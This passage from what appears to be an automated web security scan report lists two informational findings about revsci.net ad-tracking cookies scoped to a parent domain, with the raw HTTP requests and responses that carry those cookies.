KT+I5wzuiZAtfvHwlyAGPZ0tqvSyRRMopLCB5mVzSGo5567rV61Q==; Domain=.revsci.net; Expires=Sat, 05-May-2012 22:33:37 GMT; Path=/
X-Proc-ms: 5
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: image/gif
Content-Length: 43
Date: Fri, 06 May 2011 22:33:36 GMT

GIF89a.............!.......,...........D..;
17.34. http://pix04.revsci.net/H07710/b3/0/3/noscript.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /H07710/b3/0/3/noscript.gif

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /H07710/b3/0/3/noscript.gif?D=DM_EVT%3DCSM_Expedia_LP HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=2588783;type=nausc547;cat=naush134;u=9b6b0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=8e1e1163986432e20f9603df067356d2; NETSEGS_J05531=bff01c00ddc153c5&J05531&0&4de2d7db&0&&4dbcd64a&271d956a153787d6fee9112e9c6a9326; NETSEGS_G08769=bff01c00ddc153c5&G08769&0&4de391c0&0&&4dbe39cf&271d956a153787d6fee9112e9c6a9326; NETSEGS_E05516=bff01c00ddc153c5&E05516&0&4de3922b&0&&4dbcdaf4&271d956a153787d6fee9112e9c6a9326; rsiPus_cUAg="MLsXrtEupC5v4JDWbm5SF4iCa9rxq92nU/WOr6kAXZYdLpPAQvnyqW118N7oMEOiC2a+Qitt1jCSQnt7wOLuFf/9TQPsfq6IyG5KAtGyxR3fC69ZIS1PEfZ7+RJPbmgi5/Do4ttQz08XO1UZi7xW2INSPBRMu/rnPp04+54Ys4dei76PNAqSipahtYUfnrULkB+5OvuWzwKUC5dvku8yoxjK9eqMv+qsudi6yDI5p7sjklqfA/Df4499H+aU47uX/ZStvm7s0bSjla+AwzWAysWR5lO0C6CV3XcHBk4XAJoLy17PEAhkXQrA5UZbouz0UH099/lxSt54s7u/1vi/Ooc6ZsdHYnkAmIE7OjXRhH5swOnx+Qe7TQNTY5avAup317qWXxpxHGJHaYXIBQgZDvVvP1/FdYHpe4ELzEm01fLjZ3NRUu3RLcxJe/LWkVmHz79Zn9KKPtd8TZxCCYd1SF0BsJd/w4RxAXd8u6LUBqIMTYJLRCFBZYAqfyg3pMk+tHsbPBAY+t4e0y5XfrgZeOS5LS0raNTRDvmgWWyrK/P3YcYuQx+1XxK1YTDnTUoMKeILlN/WyNsBDbEYkH1exWL76rR83Bi3+v2FqFxztf6n5/2gdRHjcEt9bVnJ4z3dKF3kglsKfCM6oHY8rFN7qcjUzF9dx5DdQ3yk9RA="; rsi_us_1000000="pUMdIz9HMAYU1O2uQ7bkS/GtHFajpUjRHJppcTQ/E+fDv3TBS3u3eKtw/qV68iFxwFHQSUXJh/TEDlqK5ymryWN1lLpjgHRFDSYttD59YZFrXOXgP3z1GpnIeFgtFDR1F1h1DvPJ6jGxiMDbAnxQhvYqAwMe3iYLqU5GS2b8LfrTbx7uRJOZcXZTF1nqAhc9j1XANGppgAkqLrW5J/DkaoiGFOnArblFlMxnIUs81A34N/6VKULJ5NXcgY4g9jLOtCz0A2zRfBV0tB6nig79jyxsPK/BtufPnOuytnDMGwwiEdVEfx6xS+gdhVS/YoP8gws4gSC0AJdMoSjsujh74M9+Fuy742S9LEO0odVcgP8nwKkbsPsv3MIMTgRwUByQS0+3PTu18ZNX15PFr3nkMs5yPDt2381kVtM3tUsb7UTaDxWlFawllYsd+K30dHBKmeOvEyOfWttKqC8T1WwfifCTg5OqGJEWYbTZJKrVqzIxoqCSdeInRhO8LVs1qCHv/xxr5klEDkmKfHvF3yACOKWqmWc99TGbMUwf1jXvnMacDDEIRle75AsgC1t0n9TOjQlEvQUGZUlrBNuwrAyA8WHgji5OTrwi6ZAOSH/kv/L1brD7LtY7KfEaHdjvNdTzvoBUQMG4UTO6tV8OPsAUbmXYKs6T9V0kUdHDxS5IPWKMbw64OOcJPQgyRxyqJsiuBp3dvkWmsDV+KduhariE+vHGWgkxjV3chDQ3HlznmZrWkDHUMxVsE5mlY8EEUQt0ADLtrW3uR1r4wH3z3ZIdpJAGNmiIVyRr2c2b7jtBhTZxAAlNf7l7f35RlM2r3iTLGaF16IS79K9XrMEkuBHsy/k9wS+yaRUPCDErkqNr9YH2bA5/m2lDsmX2vxXhzSVPIsZH46KEZTqbjaFkaMVUv/ITp08VtIAQ1Yvu8ZknO30xfvR4vAy1AWEvvRf2fTQTa86Cxadw7P5qlBPGbbc96CWkKYIaCHYlvv56SO55p0Bo3OSWyjxverGSQYL67FQcst0Y+Jf/kIY+hq/65Cw5pVhi+rOWA5T/otP69RNqpLBD3wut5wpUIOU3A3cz+Fww/cmAfldRXnDpjDHyOUTv16cufUECTFP4HtE7b0vSWonFxeUXUs0PotTR+7l6VjT1pd6km8G3O6Jy+CinadIyS1ZkYM7x6spOGE5UiyQvx8Zs2WjO/p+duPiDfcEZGtR+HUDufru+EUMxg4w6AcWPnyFQbFw5FZSvULDb31fy7NREGAnb8nazQEJ7uSv7XT8wDJIORNgj0zbeAPjKWAlyPP3oRqS3CgRk7KsmlGuzBtB/H49kpYMT"; NETSEGS_G07608=bff01c00ddc153c5&G07608&0&4de3df00&0&&4dbe409f&271d956a153787d6fee9112e9c6a9326; NETSEGS_B08725=bff01c00ddc153c5&B08725&0&4de3dfb9&0&&4dbd04bb&271d956a153787d6fee9112e9c6a9326; NETSEGS_F07607=bff01c00ddc153c5&F07607&0&4de3dffd&6&10124,10098,10078,10053,10100,10143&4dbe0e23&271d956a153787d6fee9112e9c6a9326; NETSEGS_K08784=bff01c00ddc153c5&K08784&0&4de3fb79&0&&4dbe5453&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05539=bff01c00ddc153c5&K05539&0&4de3fbf4&1&10592&4dbcb06d&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05540=bff01c00ddc153c5&K05540&0&4de595d8&10&10572,10573,10342,10343,10391,10395,10432,10537,10538,10166&4dbfac5c&271d956a153787d6fee9112e9c6a9326; NETSEGS_H07710=bff01c00ddc153c5&H07710&0&4de96140&0&&4dc3b759&271d956a153787d6fee9112e9c6a9326; udm_0=MLvv9S8pLipr557J8SLcZtVsmYkpAEXfo4IXeAwquSQJS8LV1VT8e1Zf6ZL0ipL7+Kv8z8r9D7fsUFw2wl//IozSp/8YSn4NoHt7l4lq67B2aoTPJY8n/+xt25rkTM9DypP80PyOiYjfBswa/pIttQtABtvQCQc7lE2X5pTLFZly4Ho5X9JogRIv1r4DXxDUgTm31I6TxvuOcKmC/jYW5QMM3ruvTFdWWnnYKoLzU3RqHt1B+4whuE8KiYvSu8fekjRlh6End7IYoakFzgGNwXmFrORt0i1PnlcgwYHAVmdPZXPwfj5PC8fpo6ePf9KPHjtwKnWToMgc1VOatjJzghlFb3uJy+CLp/aBgvIyCGSTh51tY1Rvo4CkU9g/q/BgAxiXtL0sZoKDGnOR57czbWPW2snLVyHjK8qHn9sPGC4471fRIsWCpDXisem0f73E/ZYqkXVnZ4eygMLCHxTcBqIFjqQ0lsGEWtcVVk6WNz4l/Mewn91yb5z3TrGC94Ds0PI7lNEQ/zX+w65QliR9XUWQCR8ZJ0KoPYLJ9vKECY7qypI6JWsG/I/UnSODO2U2xhEoKpLlUINw4H3LIXL7g6gXRfai+Kt4E8gxorg1GKtpOngk4XZcT/94VjxqfHAdrOWtgThQIScl4PM9S4OeVp/AqIwVnD6+9/f77+K5aAauldE+R8qVL3mLN9jE87ZIwkWFl/denYCiK7nCJMMh1mWgtylCdkQLhvem5lL4df6OLCQDdqc2pKs/GXndlZ3eSYBP0hxu1BnT5DxxhgDCxWfzaPkEL58Qj+an9Z2aEd3idnm9kJYYUNJXJ7k1eWZB8XIaWBu+Og4PPbxN05GLrobjeAUr3OiEIqdhdgihq0P409GFU13gTUwlVlsfcu1/EYFLl0DER7k8wuY7faIt3xwOz+kc7xzOK8j7xSKy7XkKoBrIez+xK8rK00qfWaMiid3qLFhWrV7Z0YRVD5Tck40LehukJyUqz+nbRS+1uvi7svDbyhjMyqPcCeWYkKKYfULldUIH1bm8Pcz4+/tvOMe7uidWEFgdWhJeXvxXPLSHRZrYtO9j8Cnaw+R2Jc/MYSEsxo3ftJNSE1AGqd9z1IsgiJ9z5QHadxQxwsqAEgg6YrnJl7ALbsXv8caoArA7zp4fZgZtJCtxWzgclo/7zoUxCFNN/D3OGdAuyZRM4XrAxVRNGqCYmJ96huN4wxe1DAwK7D5sZ6NhmnsBvsQtpyPchz5bXwM1e1FZ05RNiXv3wbRaF4aMDm+j2wVHWV6B43cndwQ8fv7QzGvQMJpqcAx4rw==; rsi_segs_1000000=pUP15EOBMAIQf7vIQCJHhljPSEXWkLVrUBheImkRhPjVgC6MFxwKGkF6NHVB/2BO08M9QmiQSflMS0CoObMWApxrXoQc0Ll6OGkZNKFAsp2ifHChYPLAFYGM93TVLM6e+l04mihRIghaEp/YJjXEgGdsR6OjyXYIE4ccAUGnkj4VlvOr5Cw1oYSan8w0WfgHlu+8NIqCzGcqyYa9BF9YultYm/4mL4iRx/lFdc+aOmY1SRcLv60a9tJODAd0nF/i9101BB6NatVxoe1DjYfTUdd9N17JIivfPw22EIbQcVnPegF1SCok1OvyfnDR5SF1kLQ+okL5SpO7PmoTDHrWOqcBq6tcqCgkXnct+60mbddfLnCTenuSt0zS65iKrXurrLCAy0ZDKA896UwvNGoiBy0Ua8lt4RsDVNLyYBpuVD/LwytDRDz4V8uvQTl6zXeuUmyyeWpazfizP0TYzGh3YoV0j4MIz5lKfDFE4bHm5LafdV83GuKIAxww/yGxQiq11e0+Bq/l; NETSEGS_H10972=bff01c00ddc153c5&H10972&0&4de961a8&0&&4dc36aa3&271d956a153787d6fee9112e9c6a9326; rtc_2MML=MLsXtzE1ZxpnJ5GrHvmWF/CWgLZrYKUib5slCPedGNAwVTi74gkGr2Ipj4EWp+/DHqged2X1aG4UUDn9Sek+jWM8P1olTaq7ej6Dk/7O6T/gImgqfhS/fa8kwEqZhMLA7rr5dbctvj4KRqaT3jlzVpIPTLPOZlpRsFQnGcNcik0Vr/9ChiL9/dR+6TNbTGzp54iTMx9i7IA/M6syQEezQPwO4YUSLj2DbGhi/4Jolbl+6ZOTVx+W8cslzKfYsFHmuoyeGBwbsd1bTAxTphe1k40xYV92B45jmgrgB6/H89z6SRhp1GeG4kWKDw5CPfa7A/4WQDYPDQFTsZ2ttxQJ/rnIA9pRw4LfgHHRwLlNBUloulnJRNF8kdhJjEPkWfTqi1zPbesQx1fqJXeZJtyPKOqtZNI9V035IwXrvoyuFZQdQAXadNNCH9RWSxqd6nTdSu5kXKxz8xb0tYwx0LYb5txuGgmTHdyh5ie9d7thoIb/MJtZeGMLDzEOb5TkibpUjhNrG7OFF96RGpt6tIJUFbcNraCnAT46IQyNapge/OP42wmo1ckMPxlqP05nnC68WzHeGJh9k5C3WXvZpirNOd0DPxV/g/fG+5qiuL2keoExgq6g1lguUz59bg/95Hp9C9+xAs+noKPRebSc49l4l4C4tq2+eeO8HyiVB+lgSAXFESqLDcwX9oqqKLYjjqsBoHx8SrQgsDgIMV+i/N5Bdi0Ua4hBlSKh17HuEasBYtI+CzD01Uhdk/bZkXxOO/SdEn9af62gKRR4Ah33CN7MTu3l/iOkdKeYI3szmc9Yd9ozmo1pzFdrQQkKyZJeSXqZpO3p+s5n8djXqBRpmUB8YZR0VKraNlnG2tQkzx//zv339tnJCBbXR+pBEmq8L5la7a/4YaD4szeS8uTzJX0qOIEuU+AA0J3FaCkrKjdYFIAaylldJlPjIy/Q8MgnXvF7B6CosPAzzo/+2DM5jv2yh0LM3jnGkQO/A2SXqahqoAG37uql4CWsmFmZgE1furniCrruzAXaEy5s0AKznPjllNVwv1mofZOCc+h6kQCduxK+7RPxbgOHm4lLlkOV/cCKhs+1T6l+wECUFBllnwyRZ5h9E3S7JFv8gy00JNu++Qmff4WRDZCc439hxefv8hAm0PG+oWPh3uD9BFWY9mIYSZ9/3OkCQru9DqyUhOSSuBVAmpXh/c7tlYTxiToRXS8LcruHYtO+mKfZxxTs+llGpQ32PiOD6FseycwIpd2XeFPbLkYwnV45QMN+GQNS1DnslVWGvwSo+L7BVvVJjhq2qvVk0cVKwB43EcMRu9sBYvmdLvuZZUDzEVE54p2XApRprYWiMwkj6FIefpFbiHeNa6utEJv9elonE9IplVVQTbwaIxivxbxSWlJT4jFP84eoToKwJpylz5YY807t92pRWCsL0nbgNqb65Lf2Q5+0iFejG2kxa4Cu8dQrUJl27A+dH4x0UklDoA==

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rtc_2MML=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPFJEOheXIQVvUb5Bw3nLcSe/rWsx3DUgOajZMjUvBNkraeXO/p2pP6LNDeNFSZwK4/3mCVJfviaRS76OdgBdRLEO5ZoN0OAiVEuPKIPy7KVrvvoekFAdus9/RVdaNTr8DRZWq8v5lgFy81IhCEz3GO6SfeEvGPB/ePW28Rje+UaUKTzAr3aqJAP7vkZoWH+PGgzZ7+DLapvhC1VjPlIuK+MbylPCFjhhhHNirmG+ViZWCfBUFZgh51jkrN+lduMho5P/OQ5DN6QMBPOIfTUdfPAnHQEOxj62Zx5+tL9ciLqJ95kZmpzpw+s497N82TjVKL4xsXgmJPlK2b3ksV0A6vIUV15Mzo6cez9TOlt4e77ktoRZkzw4/k3KTKs/BGC3Kukzgrbhw3ckJ5/EJ1625ddtFcIBlnAS1v6sE/ucZ3wM7B8+MbCqQn6Nmy5mlI1/lVqRJybwsJMIhQysotG/XwWXx4Lmrrj/LlkFWCOuBr7cCrci3HZn5R9mp34YjB0TPr/dghLv44h5AjvA==; Domain=.revsci.net; Expires=Sat, 05-May-2012 22:35:37 GMT; Path=/
Set-Cookie: rtc_l12s=MLsXtzE1JhpnJ5HL3vzIqKPpyVrMNHGJvojUnXJXjAPTw+wWY7y45WrIsWOW0pLnHqged2X1aG4UUDn9Sek+jWM8P1olTSqSNdTxgq4nDCLC46xOmx6IxR0G+VNWGQbABRvHHzaaDDvP1ShHKDO+zvcRVLpuVzsu6kJRzFShOfPi4AZtXaq9wwNOY4bZJbpnQFEN2TQ7KRTJ8rBfM+g/kHYUL2Ae3wgujF11mbMMKQr89J+G+C/NiNon7QlzTW4lUrhT/X7stCdA9BMHH1OB6MF6HbWJ0cQ/0X2jT5wzlPvyjJSkUy36zEuwbe6aAJz48vioAYl7/RCc8hUm2CzJ74HAeaLJSxsFldBvKpKMSD4SvvbwRrNW97jjItImf/7r6+YNiPrIEahdhi8irCZzdYxsUhb6S2TvV9GnAQLVKE0b3HUva+XdBygoiSki7pU4xDIBmEPWSoq0KjkP9KA7LSna0eWtDw/RSSai0UKKqd0S9fhoVNvjUacZpD2D5le29IRTFAGcXd8G0ZDkDmuaoQbCCh71MD89MUyUx5FeHFOVPe6aSt8MI4EScP0nWyrHPghHPhppBbiTYOC1ht8uwbe2RddumDuzthrhuL2keoEygiyjtrguUx5lbg/95Hr5CN+XzqzjCG22CIaYIj1pHLeEkU/mQUSrL8mDB5n0OqlwMO4EF/zX4I6qKLZjjqsBoX78SrQgsDgLMt+h/t5BdC0Wa4hBjdkmG9BsnkNjuVOaRewamFoSlheDogIfDzIeET/8ep1AmSBCpjjvQHnOm/XdraatD89cjXmQxB0k03vOAWKL8pdJiGnYCWrQxdCk5b/NEC+imR9+1fiEPafYzCOFPbCRYsYlbzC1jdG9EFg6iOyrgrMYyT0+1bHZVSDVIxwDoTibsji3sVzNQzfkIJo1LEF1z7701aurKcGIIyYgVxrloABacahXq/Ckw8NcwvJGclRMzEmcIJ5KsxUFR4zynbONfhk//QMFIs0f948ePudxN1zPw6UVAdDYqpRYvHQo0EjST1TVhNaCBRjEbPPjwYbD1H8rGLmFC8+5rCsDt5DAFMr11/jsEWaaeh5jmD4IZLV7HnYac97sKKMm87usSK+qwCZvqO8FAq6SMLqOQp4pdu3qjzzZfxkmj1yYZK5rX3ueSZ5im7eKEAR2ivqUf14W3a+jPcNN7jn+lBDenCKYTsI2UHmKPjjYM9ItpZgr23PwZo0Qj+w6Qxr2+SLbNSRfEhyPDlStkVOaXRL82ELXFpkI292WNIWl/kw/UGrbcwSnHVycDL1LqO6SAxM1XA7+Bfm3qlit3MWvkBFO4YvTZ7jPKnzvQpsNRrtynBzQXJ3EULenVbdm1Z2XNYEQSpejpAgfvjN0W3SO9NW64LUXVscn4+mQHvT6iwuWe+bEsn4u2ZYI807tt2pRK+61OI952t5g+PbC01/Z3uVyvF8deFb9TNvHwOMA6AwViI10J+5DtA==; Domain=.revsci.net; Expires=Sat, 05-May-2012 22:35:37 GMT; Path=/
Set-Cookie: NETSEGS_K05539=bff01c00ddc153c5&K05539&0&4de961b9&1&10592&4dc358e3&271d956a153787d6fee9112e9c6a9326; Domain=.revsci.net; Expires=Fri, 03-Jun-2011 22:35:37 GMT; Path=/
X-Proc-ms: 3
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: image/gif
Content-Length: 43
Date: Fri, 06 May 2011 22:35:36 GMT

GIF89a.............!.......,...........D..;
17.35. http://pix04.revsci.net/H07710/b3/0/3/noscript.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /H07710/b3/0/3/noscript.gif

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /H07710/b3/0/3/noscript.gif?D=DM_EVT%3DCSM_Expedia_LP HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=2588783;type=nausc547;cat=naush134;u=9b6b0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=8e1e1163986432e20f9603df067356d2; NETSEGS_J05531=bff01c00ddc153c5&J05531&0&4de2d7db&0&&4dbcd64a&271d956a153787d6fee9112e9c6a9326; NETSEGS_G08769=bff01c00ddc153c5&G08769&0&4de391c0&0&&4dbe39cf&271d956a153787d6fee9112e9c6a9326; NETSEGS_E05516=bff01c00ddc153c5&E05516&0&4de3922b&0&&4dbcdaf4&271d956a153787d6fee9112e9c6a9326; rsiPus_cUAg="MLsXrtEupC5v4JDWbm5SF4iCa9rxq92nU/WOr6kAXZYdLpPAQvnyqW118N7oMEOiC2a+Qitt1jCSQnt7wOLuFf/9TQPsfq6IyG5KAtGyxR3fC69ZIS1PEfZ7+RJPbmgi5/Do4ttQz08XO1UZi7xW2INSPBRMu/rnPp04+54Ys4dei76PNAqSipahtYUfnrULkB+5OvuWzwKUC5dvku8yoxjK9eqMv+qsudi6yDI5p7sjklqfA/Df4499H+aU47uX/ZStvm7s0bSjla+AwzWAysWR5lO0C6CV3XcHBk4XAJoLy17PEAhkXQrA5UZbouz0UH099/lxSt54s7u/1vi/Ooc6ZsdHYnkAmIE7OjXRhH5swOnx+Qe7TQNTY5avAup317qWXxpxHGJHaYXIBQgZDvVvP1/FdYHpe4ELzEm01fLjZ3NRUu3RLcxJe/LWkVmHz79Zn9KKPtd8TZxCCYd1SF0BsJd/w4RxAXd8u6LUBqIMTYJLRCFBZYAqfyg3pMk+tHsbPBAY+t4e0y5XfrgZeOS5LS0raNTRDvmgWWyrK/P3YcYuQx+1XxK1YTDnTUoMKeILlN/WyNsBDbEYkH1exWL76rR83Bi3+v2FqFxztf6n5/2gdRHjcEt9bVnJ4z3dKF3kglsKfCM6oHY8rFN7qcjUzF9dx5DdQ3yk9RA="; rsi_us_1000000="pUMdIz9HMAYU1O2uQ7bkS/GtHFajpUjRHJppcTQ/E+fDv3TBS3u3eKtw/qV68iFxwFHQSUXJh/TEDlqK5ymryWN1lLpjgHRFDSYttD59YZFrXOXgP3z1GpnIeFgtFDR1F1h1DvPJ6jGxiMDbAnxQhvYqAwMe3iYLqU5GS2b8LfrTbx7uRJOZcXZTF1nqAhc9j1XANGppgAkqLrW5J/DkaoiGFOnArblFlMxnIUs81A34N/6VKULJ5NXcgY4g9jLOtCz0A2zRfBV0tB6nig79jyxsPK/BtufPnOuytnDMGwwiEdVEfx6xS+gdhVS/YoP8gws4gSC0AJdMoSjsujh74M9+Fuy742S9LEO0odVcgP8nwKkbsPsv3MIMTgRwUByQS0+3PTu18ZNX15PFr3nkMs5yPDt2381kVtM3tUsb7UTaDxWlFawllYsd+K30dHBKmeOvEyOfWttKqC8T1WwfifCTg5OqGJEWYbTZJKrVqzIxoqCSdeInRhO8LVs1qCHv/xxr5klEDkmKfHvF3yACOKWqmWc99TGbMUwf1jXvnMacDDEIRle75AsgC1t0n9TOjQlEvQUGZUlrBNuwrAyA8WHgji5OTrwi6ZAOSH/kv/L1brD7LtY7KfEaHdjvNdTzvoBUQMG4UTO6tV8OPsAUbmXYKs6T9V0kUdHDxS5IPWKMbw64OOcJPQgyRxyqJsiuBp3dvkWmsDV+KduhariE+vHGWgkxjV3chDQ3HlznmZrWkDHUMxVsE5mlY8EEUQt0ADLtrW3uR1r4wH3z3ZIdpJAGNmiIVyRr2c2b7jtBhTZxAAlNf7l7f35RlM2r3iTLGaF16IS79K9XrMEkuBHsy/k9wS+yaRUPCDErkqNr9YH2bA5/m2lDsmX2vxXhzSVPIsZH46KEZTqbjaFkaMVUv/ITp08VtIAQ1Yvu8ZknO30xfvR4vAy1AWEvvRf2fTQTa86Cxadw7P5qlBPGbbc96CWkKYIaCHYlvv56SO55p0Bo3OSWyjxverGSQYL67FQcst0Y+Jf/kIY+hq/65Cw5pVhi+rOWA5T/otP69RNqpLBD3wut5wpUIOU3A3cz+Fww/cmAfldRXnDpjDHyOUTv16cufUECTFP4HtE7b0vSWonFxeUXUs0PotTR+7l6VjT1pd6km8G3O6Jy+CinadIyS1ZkYM7x6spOGE5UiyQvx8Zs2WjO/p+duPiDfcEZGtR+HUDufru+EUMxg4w6AcWPnyFQbFw5FZSvULDb31fy7NREGAnb8nazQEJ7uSv7XT8wDJIORNgj0zbeAPjKWAlyPP3oRqS3CgRk7KsmlGuzBtB/H49kpYMT"; NETSEGS_G07608=bff01c00ddc153c5&G07608&0&4de3df00&0&&4dbe409f&271d956a153787d6fee9112e9c6a9326; NETSEGS_B08725=bff01c00ddc153c5&B08725&0&4de3dfb9&0&&4dbd04bb&271d956a153787d6fee9112e9c6a9326; NETSEGS_F07607=bff01c00ddc153c5&F07607&0&4de3dffd&6&10124,10098,10078,10053,10100,10143&4dbe0e23&271d956a153787d6fee9112e9c6a9326; NETSEGS_K08784=bff01c00ddc153c5&K08784&0&4de3fb79&0&&4dbe5453&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05540=bff01c00ddc153c5&K05540&0&4de595d8&10&10572,10573,10342,10343,10391,10395,10432,10537,10538,10166&4dbfac5c&271d956a153787d6fee9112e9c6a9326; NETSEGS_H07710=bff01c00ddc153c5&H07710&0&4de96140&0&&4dc3b759&271d956a153787d6fee9112e9c6a9326; udm_0=MLvv9S8pLipr557J8SLcZtVsmYkpAEXfo4IXeAwquSQJS8LV1VT8e1Zf6ZL0ipL7+Kv8z8r9D7fsUFw2wl//IozSp/8YSn4NoHt7l4lq67B2aoTPJY8n/+xt25rkTM9DypP80PyOiYjfBswa/pIttQtABtvQCQc7lE2X5pTLFZly4Ho5X9JogRIv1r4DXxDUgTm31I6TxvuOcKmC/jYW5QMM3ruvTFdWWnnYKoLzU3RqHt1B+4whuE8KiYvSu8fekjRlh6End7IYoakFzgGNwXmFrORt0i1PnlcgwYHAVmdPZXPwfj5PC8fpo6ePf9KPHjtwKnWToMgc1VOatjJzghlFb3uJy+CLp/aBgvIyCGSTh51tY1Rvo4CkU9g/q/BgAxiXtL0sZoKDGnOR57czbWPW2snLVyHjK8qHn9sPGC4471fRIsWCpDXisem0f73E/ZYqkXVnZ4eygMLCHxTcBqIFjqQ0lsGEWtcVVk6WNz4l/Mewn91yb5z3TrGC94Ds0PI7lNEQ/zX+w65QliR9XUWQCR8ZJ0KoPYLJ9vKECY7qypI6JWsG/I/UnSODO2U2xhEoKpLlUINw4H3LIXL7g6gXRfai+Kt4E8gxorg1GKtpOngk4XZcT/94VjxqfHAdrOWtgThQIScl4PM9S4OeVp/AqIwVnD6+9/f77+K5aAauldE+R8qVL3mLN9jE87ZIwkWFl/denYCiK7nCJMMh1mWgtylCdkQLhvem5lL4df6OLCQDdqc2pKs/GXndlZ3eSYBP0hxu1BnT5DxxhgDCxWfzaPkEL58Qj+an9Z2aEd3idnm9kJYYUNJXJ7k1eWZB8XIaWBu+Og4PPbxN05GLrobjeAUr3OiEIqdhdgihq0P409GFU13gTUwlVlsfcu1/EYFLl0DER7k8wuY7faIt3xwOz+kc7xzOK8j7xSKy7XkKoBrIez+xK8rK00qfWaMiid3qLFhWrV7Z0YRVD5Tck40LehukJyUqz+nbRS+1uvi7svDbyhjMyqPcCeWYkKKYfULldUIH1bm8Pcz4+/tvOMe7uidWEFgdWhJeXvxXPLSHRZrYtO9j8Cnaw+R2Jc/MYSEsxo3ftJNSE1AGqd9z1IsgiJ9z5QHadxQxwsqAEgg6YrnJl7ALbsXv8caoArA7zp4fZgZtJCtxWzgclo/7zoUxCFNN/D3OGdAuyZRM4XrAxVRNGqCYmJ96huN4wxe1DAwK7D5sZ6NhmnsBvsQtpyPchz5bXwM1e1FZ05RNiXv3wbRaF4aMDm+j2wVHWV6B43cndwQ8fv7QzGvQMJpqcAx4rw==; NETSEGS_H10972=bff01c00ddc153c5&H10972&0&4de961a8&0&&4dc36aa3&271d956a153787d6fee9112e9c6a9326; rsi_segs_1000000=pUPFJEOheXIQVvUb5Bw3nLcSe/rWsx3DUgOajZMjUvBNkraeXO/p2pP6LNDeNFSZwK4/3mCVJfviaRT79+dgBdRLEO5ZoN0OAiVEuPKIPy7KVrvvoekFAdus9/RVdaNTr8DRZWq8v5lgFy81IhCEz3GO6SfeEvGPB/ePW28Rje+UaUKTzAr3aqJAP7vkZoWH+PGgzZ7+DLapvhC1VjPlIuK+MbylPCFjhhhHNirmG+ViZWCfBUFZgh51jhqhMcxwA/tm9SHxHcKF/BYQzcy8eKnGKEj3/Mh2NPlCCzwTqDEgda1QFj88u3iYrYO0eQBlIq7ADEX3BTzYP/cCovKnKloJZsmdbrpz9YbcuPcmVUr8F61tvh1YpLb/jdAvR9EW8XtYLwFVc10vhq+rF3CMgpL33pey1aj17claX2TjQCvjtLSS6T5pVMNGhxLcTLmSk5sRkhBJgO9umpeIc9z3LW0Qtg+TFeOqQBp7h3WC1bNyjT0tsIA6QUFJ37bFfcIDlNqUSGAqpmIoClwjtQ==; rtc_cer_=MLsXtzE1JhpnJ5HL3vzIqKPpyVrMNHGJvojUnXJXjAPTw+wWY7y45WrIsWOW0pLnHqged2X1aG4UUDn9Sek+jWM8P1olTSqSNdTxgq4nDCLC46xOmx6IxR0G+VNWGQbABRvHHzaaDDvP1ShHKDO+zvcRVLpuVzsu6kJRzFShOfPi4AZtXaq9wwNOY4bZJbpnQFEN2TQ7KRTJ8rBfM+g/kHYUL2Ae3wgujF11mbMMKQr89J+G+C/NiNon7QlzTW4lUrhT/X7stCdA9BMHH1OB6MF6HbWJ0cQ/0X2jT5wzlPvyjJSkUy36zEuwbe6aAJz48vioAYl7/RCc8hUm2CzJ74HAeaLJSxsFldBvKpKMSD4SvvbwRrNW97jjItImf/7r6+YNiPrIEahdhi8irCZzdYxsUhb6S2TvV9GnAQLVKE0b3HUva+XdBygoiSki7pU4xDIBmEPWSoq0KjkP9KA7LSna0eWtDw/RSSai0UKKqd0S9fhoVNvjUacZpD2D5le29IRTFAGcXd8G0ZDkDmuaoQbCCh71MD89MUyUx5FeHFOVPe6aSt8MI4EScP0nWyrHPghHPhppBbiTYOC1ht8uwbe2RddumDuzthrhuL2keoEygiyjtrguUx5lbg/95Hr5CN+XzqzjCG22CIaYIj1pHLeEkU/mQUSrL8mDB5n0OqlwMO4EF/zX4I6qKLZjjqsBoX78SrQgsDgLMt+h/t5BdC0Wa4hBjdkmG9BsnkNjuVOaRewamFoSlheDogIfDzIeET/8ep1AmSBCpjjvQHnOm/XdraatD89cjXmQxB0k03vOAWKL8pdJiGnYCWrQxdCk5b/NEC+imR9+1fiEPafYzCOFPbCRYsYlbzC1jdG9EFg6iOyrgrMYyT0+1bHZVSDVIxwD